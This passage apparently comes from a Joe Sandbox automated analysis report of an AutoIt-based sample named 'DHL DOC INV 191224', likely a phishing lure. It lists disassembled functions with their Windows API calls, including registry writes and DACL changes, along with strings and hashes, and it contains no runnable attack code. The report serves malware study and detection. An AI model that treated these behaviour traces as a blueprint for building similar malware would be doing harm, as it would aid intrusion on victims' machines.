                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4124339563-0
                                                                                                                        • Opcode ID: 7cf6592574fe623038519772a355cb3d1259262cca3679425721411da5412a85
                                                                                                                        • Instruction ID: 287f7da80c1d5ea5cb6ab1ebe75e7da88d9714212613e536b2618f1be68aba8c
                                                                                                                        • Opcode Fuzzy Hash: 7cf6592574fe623038519772a355cb3d1259262cca3679425721411da5412a85
                                                                                                                        • Instruction Fuzzy Hash: 9FA19D72018301AFDB029F61DC48E6BBBA9FB89320F141A19F966D61E1D731F944CF91
                                                                                                                        Function 00348D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?), ref: 00348E14
                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00386AC5
                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00386AFE
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00386F43
                                                                                                                          • Part of subcall function 00348F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00348BE8,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348FC5
                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00386F7F
                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00386F96
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00386FAC
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00386FB7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                        • String ID: 0$xV
                                                                                                                        • API String ID: 2760611726-4207226023
                                                                                                                        • Opcode ID: 8d28a93bcbc8230c57210f5d1d60ffe34123cab7fc3f653e841107345a8f4329
                                                                                                                        • Instruction ID: f0819ad5859bbb569006bfb543da91db37a5760e6f40e7f1e65dd70b3916c996
                                                                                                                        • Opcode Fuzzy Hash: 8d28a93bcbc8230c57210f5d1d60ffe34123cab7fc3f653e841107345a8f4329
                                                                                                                        • Instruction Fuzzy Hash: D912AB30600201DFDB27EF24C995BAAB7E9FB44300F1544A9E589DB662CB31FC92DB91
                                                                                                                        Function 003B2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 003B273E
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003B286A
                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003B28A9
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003B28B9
                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 003B2900
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 003B290C
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 003B2955
                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003B2964
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 003B2974
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 003B2978
                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 003B2988
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B2991
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 003B299A
                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003B29C6
                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 003B29DD
                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 003B2A1D
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003B2A31
                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 003B2A42
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 003B2A77
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 003B2A82
                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003B2A8D
                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 003B2A97
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                        • Opcode ID: d3acf987375aa4005f98f9d9ed8871945171250656263509393ffb4df2e5bdad
                                                                                                                        • Instruction ID: 47d3c41e0db9b6075c80a6dae26884b68283f6b53f1be8cacb8f46508ac3dabc
                                                                                                                        • Opcode Fuzzy Hash: d3acf987375aa4005f98f9d9ed8871945171250656263509393ffb4df2e5bdad
                                                                                                                        • Instruction Fuzzy Hash: 32B16F71A10215AFEB15DF69CD8AFAF7BA9EB09714F004114FA14EB6A0D770ED40CB54
                                                                                                                        Function 003A4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003A4AED
                                                                                                                        • GetDriveTypeW.KERNEL32(?,003CCB68,?,\\.\,003CCC08), ref: 003A4BCA
                                                                                                                        • SetErrorMode.KERNEL32(00000000,003CCB68,?,\\.\,003CCC08), ref: 003A4D36
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                        • Opcode ID: 227e30be2bde072378effecdcf45e15c7c83f351bb0b3d01b212f9c5d569f69e
                                                                                                                        • Instruction ID: 8e601fa9b2b52eda7385b550fa07c232c82e35b140d6f3e6617f19caf608e3cb
                                                                                                                        • Opcode Fuzzy Hash: 227e30be2bde072378effecdcf45e15c7c83f351bb0b3d01b212f9c5d569f69e
                                                                                                                        • Instruction Fuzzy Hash: 0061D330605309EBCB07DF28CA83DBC77B4EB86350B248415F90AABA56DBB1ED41DB51
                                                                                                                        Function 003C73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000012), ref: 003C7421
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 003C7425
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 003C743B
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 003C7446
                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 003C744B
                                                                                                                        • GetSysColor.USER32(00000011), ref: 003C7463
                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003C7471
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 003C7482
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 003C748B
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003C7498
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003C74B7
                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003C74CE
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C74DB
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C752A
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003C7554
                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 003C7572
                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 003C757D
                                                                                                                        • GetSysColor.USER32(00000011), ref: 003C758E
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 003C7596
                                                                                                                        • DrawTextW.USER32(?,003C70F5,000000FF,?,00000000), ref: 003C75A8
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003C75BF
                                                                                                                        • DeleteObject.GDI32(?), ref: 003C75CA
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003C75D0
                                                                                                                        • DeleteObject.GDI32(?), ref: 003C75D5
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 003C75DB
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 003C75E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1996641542-0
                                                                                                                        • Opcode ID: 5e12cd954658790bbd080e6d3e6394a13a5cb7894e99d37bfd11a5d6a90e272f
                                                                                                                        • Instruction ID: 715b4e6cee5a6aebe8a912339a843f62d286d9c097b4e938db49f3cb53a7add1
                                                                                                                        • Opcode Fuzzy Hash: 5e12cd954658790bbd080e6d3e6394a13a5cb7894e99d37bfd11a5d6a90e272f
                                                                                                                        • Instruction Fuzzy Hash: C8615972900218AFDB029FA5DC49EAEBFB9EB09320F155115F919EB2A1D771AD40CF90
                                                                                                                        Function 003C0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C1128
                                                                                                                        • GetDesktopWindow.USER32 ref: 003C113D
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 003C1144
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C1199
                                                                                                                        • DestroyWindow.USER32(?), ref: 003C11B9
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003C11ED
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C120B
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003C121D
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 003C1232
                                                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 003C1245
                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 003C12A1
                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003C12BC
                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003C12D0
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003C12E8
                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 003C130E
                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 003C1328
                                                                                                                        • CopyRect.USER32(?,?), ref: 003C133F
                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 003C13AA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                        • Opcode ID: b8bb5b61e1cde6a897ef62bac4bd09794732bb412181b59c29f8a36f39094080
                                                                                                                        • Instruction ID: d072f7e5bcbb4962c96b3df070fe53ce5d5aba2c2707745c411075c11a1247f3
                                                                                                                        • Opcode Fuzzy Hash: b8bb5b61e1cde6a897ef62bac4bd09794732bb412181b59c29f8a36f39094080
                                                                                                                        • Instruction Fuzzy Hash: 25B16671604341AFD711DF64C984F6ABBE8AB89344F00891CF999DB2A2C771EC44DB92
                                                                                                                        Function 003C0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003C02E5
                                                                                                                        • _wcslen.LIBCMT ref: 003C031F
                                                                                                                        • _wcslen.LIBCMT ref: 003C0389
                                                                                                                        • _wcslen.LIBCMT ref: 003C03F1
                                                                                                                        • _wcslen.LIBCMT ref: 003C0475
                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003C04C5
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003C0504
                                                                                                                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                                                                                                                          • Part of subcall function 0039223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00392258
                                                                                                                          • Part of subcall function 0039223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0039228A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                        • API String ID: 1103490817-719923060
                                                                                                                        • Opcode ID: 88391434dd26fc6533f9f8e43855adebc272b59e36de61f419c590cb5555ac5f
                                                                                                                        • Instruction ID: 6d98e9eee2ffa1eadc5d12138b3a0e985c9b8d16ef9273168fcf4f26de49852d
                                                                                                                        • Opcode Fuzzy Hash: 88391434dd26fc6533f9f8e43855adebc272b59e36de61f419c590cb5555ac5f
                                                                                                                        • Instruction Fuzzy Hash: BDE19B35208281CFCB1ADF24C591E2AB3E6BF89714F15495CF896AB6A1DB30ED45CB41
                                                                                                                        Function 00348891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00348968
                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00348970
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0034899B
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 003489A3
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 003489C8
                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003489E5
                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003489F5
                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00348A28
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00348A3C
                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00348A5A
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00348A76
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00348A81
                                                                                                                          • Part of subcall function 0034912D: GetCursorPos.USER32(?), ref: 00349141
                                                                                                                          • Part of subcall function 0034912D: ScreenToClient.USER32(00000000,?), ref: 0034915E
                                                                                                                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000001), ref: 00349183
                                                                                                                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000002), ref: 0034919D
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,003490FC), ref: 00348AA8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                        • Opcode ID: 5b6ffdc352d1a73cf8d5ce4c84410de40ed05238ee719a23d1827a935062b7b9
                                                                                                                        • Instruction ID: a6d4c405e7dc08f85e6c8a23f6d3b57781c2327a42bfb293571dc5b431fe5992
                                                                                                                        • Opcode Fuzzy Hash: 5b6ffdc352d1a73cf8d5ce4c84410de40ed05238ee719a23d1827a935062b7b9
                                                                                                                        • Instruction Fuzzy Hash: 6DB17D71A002099FDB16EFA8CD45FAE3BB5FB48314F114229FA15EB2A0DB74E940CB55
                                                                                                                        Function 00390D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                                                                                                                          • Part of subcall function 003910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                                                                                                                          • Part of subcall function 003910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                                                                                                                          • Part of subcall function 003910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                                                                                                                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00390DF5
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00390E29
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00390E40
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00390E7A
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00390E96
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00390EAD
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00390EB5
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00390EBC
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00390EDD
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00390EE4
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00390F13
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00390F35
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00390F47
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F6E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00390F75
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F7E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00390F85
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F8E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00390F95
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00390FA1
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00390FA8
                                                                                                                          • Part of subcall function 00391193: GetProcessHeap.KERNEL32(00000008,00390BB1,?,00000000,?,00390BB1,?), ref: 003911A1
                                                                                                                          • Part of subcall function 00391193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00390BB1,?), ref: 003911A8
                                                                                                                          • Part of subcall function 00391193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00390BB1,?), ref: 003911B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4175595110-0
                                                                                                                        • Opcode ID: 9118ff68a6fa784a231ee95420e28172719fed76c4b9c8bfb3561ecf612338a6
                                                                                                                        • Instruction ID: 591d971b0f1597b3d5939c7dfc5c3007eb66dd5c2b79112fbaf8c5791a471300
                                                                                                                        • Opcode Fuzzy Hash: 9118ff68a6fa784a231ee95420e28172719fed76c4b9c8bfb3561ecf612338a6
                                                                                                                        • Instruction Fuzzy Hash: D871597290021AAFDF269FA5DC48FAEBBBCFF04300F054115F91AE6291D731AA05CB60
                                                                                                                        Function 003BC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BC4BD
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,003CCC08,00000000,?,00000000,?,?), ref: 003BC544
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 003BC5A4
                                                                                                                        • _wcslen.LIBCMT ref: 003BC5F4
                                                                                                                        • _wcslen.LIBCMT ref: 003BC66F
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 003BC6B2
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 003BC7C1
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 003BC84D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003BC881
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003BC88E
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 003BC960
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
